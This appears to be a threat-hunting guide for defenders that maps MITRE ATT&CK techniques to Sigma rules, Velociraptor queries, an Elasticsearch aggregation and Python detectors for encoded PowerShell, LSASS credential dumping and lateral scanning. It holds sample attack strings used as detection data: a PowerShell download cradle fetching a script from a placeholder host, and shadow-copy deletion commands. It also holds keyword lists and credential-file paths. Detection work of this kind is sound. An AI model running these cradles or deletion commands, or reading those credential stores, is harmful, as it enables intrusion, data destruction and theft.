Traditional security is reactive: wait for an alert, then investigate. Threat hunting flips this model. Instead of waiting for detection systems to fire, threat hunters proactively search for evidence of attackers who are already inside — before any alerts trigger. Studies consistently show that the median attacker dwell time inside a network before discovery is weeks to months. Threat hunting compresses that timeline to hours or days. This guide teaches the methodology and MITRE ATT&CK-based techniques that professional threat hunters use.
The Threat Hunting Mindset
Threat hunting starts with a hypothesis — an assumption about attacker behavior based on threat intelligence. You do not search aimlessly. You form a specific question: “Are there any processes on this network that are spawning cmd.exe from unusual parent processes?” Then you go find evidence to confirm or deny it.
The MITRE ATT&CK framework is your hunting catalog. It documents 14 tactic categories (Initial Access, Execution, Persistence, Privilege Escalation, etc.) and hundreds of specific techniques with detection guidance. Every hunt should map to a specific ATT&CK technique.
MITRE ATT&CK: Your Hunting Map
# Key ATT&CK techniques with the highest ROI for hunting:
# T1059.001 — PowerShell execution (extremely common for attacks)
# Hunt: Look for encoded PowerShell commands (-EncodedCommand flag)
# Windows Event ID 4104 (Script Block Logging) shows the actual code
# T1053.005 — Scheduled Tasks (common persistence mechanism)
# Hunt: Look for scheduled tasks created in the last 7 days
# T1003.001 — LSASS Memory Dump (credential theft)
# Hunt: Look for processes accessing lsass.exe memory
# T1071.001 — Web Protocol C2 (HTTPS-based command and control)
# Hunt: Look for unusual processes making HTTPS connections
# T1055 — Process Injection (attacker code injected into legit processes)
# Hunt: Look for unsigned code running in signed process memory space
Hunt 1: Detecting Living-Off-the-Land Attacks
“Living off the land” means attackers use legitimate Windows tools (PowerShell, WMI, certutil, mshta) to perform malicious actions, blending in with normal administrative activity. These are hard for signature-based tools to catch.
# Hunting with Sigma rules (universal SIEM rule format):
# Install sigma-cli to convert rules to your SIEM's query language:
pip install sigma-cli
# Example: Detect PowerShell downloading content (T1059.001 + T1105)
# Sigma rule (YAML; indentation is significant):
title: PowerShell Download Cradle
status: test
logsource:
    product: windows
    service: powershell
detection:
    keywords:
        - 'DownloadString'
        - 'DownloadFile'
        - 'WebClient'
        - 'Invoke-WebRequest'
        - 'IEX'
        - 'Net.WebClient'
    condition: keywords
falsepositives:
    - Legitimate admin scripts
level: medium
# Hunting with Velociraptor (ask ALL endpoints simultaneously):
# Hunt: Find encoded PowerShell executions in process command lines
# (single-quoted VQL strings keep the regex backslashes literal; (?i) makes the match case-insensitive)
SELECT Pid, Name, CommandLine, CreateTime
FROM pslist()
WHERE CommandLine =~ '(?i)-EncodedCommand|-enc\s+[A-Za-z0-9+/=]{50}'
# Hunt: Find LOLBins (Living Off the Land Binaries) executing unusual things
SELECT Pid, Name, CommandLine, Ppid
FROM pslist()
WHERE Name IN ('certutil.exe', 'mshta.exe', 'regsvr32.exe', 'rundll32.exe')
  AND CommandLine =~ '(?i)http|ftp|download|\.ps1|\.hta|script'
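The Sigma keywords above only fire on plaintext; an encoded command line hides them until you decode the UTF-16LE base64 payload. This added example (not code from the original guide) decodes an -EncodedCommand argument from constructed 4688-style records and then applies the same keyword list, so both encoded and plain cradles are caught in one pass.

```python
import base64
import re
from typing import Optional

# Keyword list mirrors the Sigma rule above; extend per environment.
CRADLE_KEYWORDS = ["DownloadString", "DownloadFile", "WebClient",
                   "Invoke-WebRequest", "IEX", "Net.WebClient"]
# powershell.exe accepts abbreviated flags: -e, -ec, -enc and -EncodedCommand all work.
ENC_FLAG = re.compile(r"(?i)\s-e(?:nc(?:odedcommand)?|c)?\s+([A-Za-z0-9+/=]{20,})")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script when cmdline carries an encoded payload, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        # PowerShell base64-encodes the script as UTF-16LE, not UTF-8.
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_cradle_keywords(text: str) -> list:
    """Case-insensitive substring match, like the Sigma 'keywords' detection."""
    low = text.lower()
    return [k for k in CRADLE_KEYWORDS if k.lower() in low]


def hunt(records) -> list:
    """records: iterable of (pid, command_line). Decode first, then match keywords."""
    findings = []
    for pid, cmdline in records:
        script = decode_encoded_command(cmdline)
        text = script if script is not None else cmdline
        hits = find_cradle_keywords(text)
        if hits:
            findings.append({"pid": pid, "encoded": script is not None,
                             "keywords": hits, "script": text})
    return findings


# Constructed 4688-style records for the demo (placeholder URLs, not real telemetry).
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/a.ps1')"
    .encode("utf-16-le")).decode()
SAMPLE_RECORDS = [
    (4321, "powershell.exe -NoP -W Hidden -enc " + ENCODED),
    (4322, "powershell.exe -File C:\\Scripts\\backup.ps1"),
    (4323, "powershell.exe -c Invoke-WebRequest https://placeholder.invalid/p.msi -OutFile p.msi"),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_RECORDS):
        print(f["pid"], "encoded" if f["encoded"] else "plain", f["keywords"])
```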
Hunt 2: Credential Access Detection
# LSASS access detection (Mimikatz-style credential dumping)
# Sysmon Event ID 10 (ProcessAccess) — a process opening a handle to lsass.exe;
# the GrantedAccess field carries the access mask that was requested
# Wazuh/Sigma rule for LSASS access:
# Security Event 4656 — handle to an object requested with specific access rights
# Filter for: ObjectName contains "lsass.exe" AND AccessMask = "0x1410"
# Hunt for volume shadow copy deletion (ransomware pre-cursor):
# vssadmin delete shadows /all /quiet
# wmic shadowcopy delete
SELECT CommandLine, CreateTime
FROM pslist()
WHERE CommandLine =~ "vssadmin.*delete|wmic.*shadowcopy.*delete"
# Hunt for credential files accessed in the last hour
# (NTFS only updates last-access times when NtfsDisableLastAccessUpdate is off,
# so treat an empty result as inconclusive rather than as a clean bill of health):
SELECT FullPath, Atime, Size
FROM glob(globs=['C:\Users\*\AppData\Local\Google\Chrome\User Data\Default\Login Data',
                 'C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\logins.json'])
WHERE Atime > timestamp(epoch=now() - 3600)
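The 0x1410 filter above is a single value; a real hunt should reason about the access-right bits, since dumpers also show up with 0x1010, 0x1FFFFF and other masks. This added example (not from the original guide) triages constructed Sysmon Event 10 records: it keeps only handles to lsass.exe that include PROCESS_VM_READ, drops a starting allowlist of known-good source images (an assumption to tune per environment), and notes when the CallTrace contains UNKNOWN frames, which indicates the call came from memory not backed by a file.

```python
# Windows PROCESS_* access-right bits relevant to credential dumping.
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
RIGHT_NAMES = {PROCESS_VM_OPERATION: "VM_OPERATION", PROCESS_VM_READ: "VM_READ",
               PROCESS_VM_WRITE: "VM_WRITE", PROCESS_QUERY_INFORMATION: "QUERY_INFORMATION",
               PROCESS_QUERY_LIMITED_INFORMATION: "QUERY_LIMITED_INFORMATION"}

# Starting allowlist of images that legitimately open LSASS (an assumption; tune per environment).
KNOWN_GOOD = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe",
              r"c:\program files\windows defender\msmpeng.exe"}


def explain_mask(mask: int) -> list:
    """Translate a GrantedAccess mask into the named rights it contains."""
    return [name for bit, name in RIGHT_NAMES.items() if mask & bit]


def triage_event10(event: dict):
    """Return a finding for one Sysmon Event 10 record, or None if it is not LSASS memory access."""
    if not event["TargetImage"].lower().endswith(r"\lsass.exe"):
        return None
    mask = int(event["GrantedAccess"], 16)
    if not mask & PROCESS_VM_READ:          # query-only handles cannot read credentials
        return None
    if event["SourceImage"].lower() in KNOWN_GOOD:
        return None
    return {"source": event["SourceImage"], "mask": hex(mask), "rights": explain_mask(mask),
            # UNKNOWN frames in CallTrace mean the caller is code not backed by a file on disk
            "unbacked_caller": "UNKNOWN" in event.get("CallTrace", "")}


def hunt_lsass(events) -> list:
    return [f for f in (triage_event10(e) for e in events) if f]


# Constructed Sysmon Event 10 records for the demo (not real telemetry).
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1000", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d2c4"},
    {"SourceImage": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d2c4|UNKNOWN(000001F0)"},
    {"SourceImage": r"C:\Windows\System32\svchost.exe", "TargetImage": r"C:\Windows\System32\services.exe",
     "GrantedAccess": "0x1410", "CallTrace": ""},
]

if __name__ == "__main__":
    for f in hunt_lsass(SAMPLE_EVENTS):
        print(f["source"], f["mask"], f["rights"], "unbacked caller" if f["unbacked_caller"] else "")
```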
Hunt 3: Lateral Movement Detection
# Lateral movement via SMB (PsExec / SMB share access):
# Windows Security Event ID 4624 — logon type 3 (network) from internal IPs at unusual hours
# Windows Security Event ID 5140 — network share access
# Hunting internal port scanning (attacker mapping the network):
# Look for a single host making connections to 10+ internal hosts on ports 445, 3389 or 22
# in a short time window
# Elasticsearch/Wazuh query for this pattern ("size": 0 because only the aggregation is needed;
# the terms aggregation size is raised from the default of 10 so scanners are not cut off):
{
  "size": 0,
  "query": {
    "bool": {
      "must": [
        {"range": {"@timestamp": {"gte": "now-1h"}}},
        {"terms": {"data.dstport": [445, 3389, 22]}},
        {"script": {"script": "doc['data.srcip'].value.startsWith('10.')"}}
      ]
    }
  },
  "aggs": {
    "src_hosts": {
      "terms": {"field": "data.srcip", "size": 500},
      "aggs": {
        "unique_dst": {"cardinality": {"field": "data.dstip"}}
      }
    }
  }
}
# Flag any source IP contacting 10+ unique destinations in 1 hour
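The aggregation above counts distinct destinations inside one fixed hour; a slow sweep that straddles the boundary, or a busy admin host hitting the same few servers repeatedly, needs the logic spelled out. This added example (not from the original guide) implements the same hunt over constructed flow records with a sliding 1-hour window, restricted to the lateral-movement ports and to an assumed internal range of 10.0.0.0/8.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

LATERAL_PORTS = {445, 3389, 22}
INTERNAL = ip_network("10.0.0.0/8")   # assumption: the site's internal range
WINDOW = timedelta(hours=1)
THRESHOLD = 10                        # distinct internal hosts, as in the query above


def find_scanners(flows) -> dict:
    """flows: iterable of (timestamp, srcip, dstip, dstport).
    Returns {srcip: peak distinct-destination count} for sources that reach THRESHOLD or more
    distinct internal hosts on lateral-movement ports inside any sliding 1-hour window."""
    by_src = defaultdict(list)
    for ts, src, dst, port in flows:
        if port in LATERAL_PORTS and ip_address(src) in INTERNAL and ip_address(dst) in INTERNAL:
            by_src[src].append((ts, dst))
    flagged = {}
    for src, events in by_src.items():
        events.sort()
        peak, start = 0, 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > WINDOW:   # slide the window forward
                start += 1
            peak = max(peak, len({d for _, d in events[start:end + 1]}))
        if peak >= THRESHOLD:
            flagged[src] = peak
    return flagged


# Constructed flow records for the demo (not real traffic).
T0 = datetime(2024, 1, 15, 9, 0)
SAMPLE_FLOWS = (
    # 12 distinct hosts on 445 within 12 minutes: a fast sweep, should be flagged
    [(T0 + timedelta(minutes=i), "10.0.5.20", f"10.0.5.{101 + i}", 445) for i in range(12)]
    # the same 3 RDP targets over and over: a busy admin host, not a scan
    + [(T0 + timedelta(minutes=i), "10.0.5.30", f"10.0.5.{50 + i % 3}", 3389) for i in range(30)]
    # 15 SSH hosts at one per 15 minutes: never 10 inside a single hour
    + [(T0 + timedelta(minutes=15 * i), "10.0.5.40", f"10.0.5.{150 + i}", 22) for i in range(15)]
    # web traffic on port 80 is out of scope for this hunt
    + [(T0 + timedelta(minutes=i), "10.0.5.20", f"10.0.7.{1 + i}", 80) for i in range(40)]
)

if __name__ == "__main__":
    print(find_scanners(SAMPLE_FLOWS))   # {'10.0.5.20': 12}
```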
Building a Threat Hunting Program
The Hunt Cycle
- Create a hypothesis — based on threat intel, ATT&CK, or observed anomalies in your environment
- Define the data sources needed — what logs do you need? Process logs, network flows, EDR telemetry?
- Execute the hunt — query your SIEM or EDR, examine results, look for outliers
- Document findings — even negative results are valuable (confirms your environment does not exhibit this behavior)
- Automate successful hunts — if a hunt finds something, turn it into a detection rule so future instances alert automatically
Essential Data Sources to Enable
- Sysmon — enhanced Windows event logging. Process creation with hashes (Event 1), network connections (Event 3), file creation (Event 11), registry changes (Events 12-14)
- PowerShell Script Block Logging — enables Event 4104, captures all PowerShell code executed even if obfuscated
- Command Line Auditing — enables full command line in Event 4688 (Process Creation)
- DNS logging — every DNS query from every host. Reveals C2 domains, data exfiltration, DGA patterns
- Firewall/NetFlow logs — who talked to whom, when, how much data transferred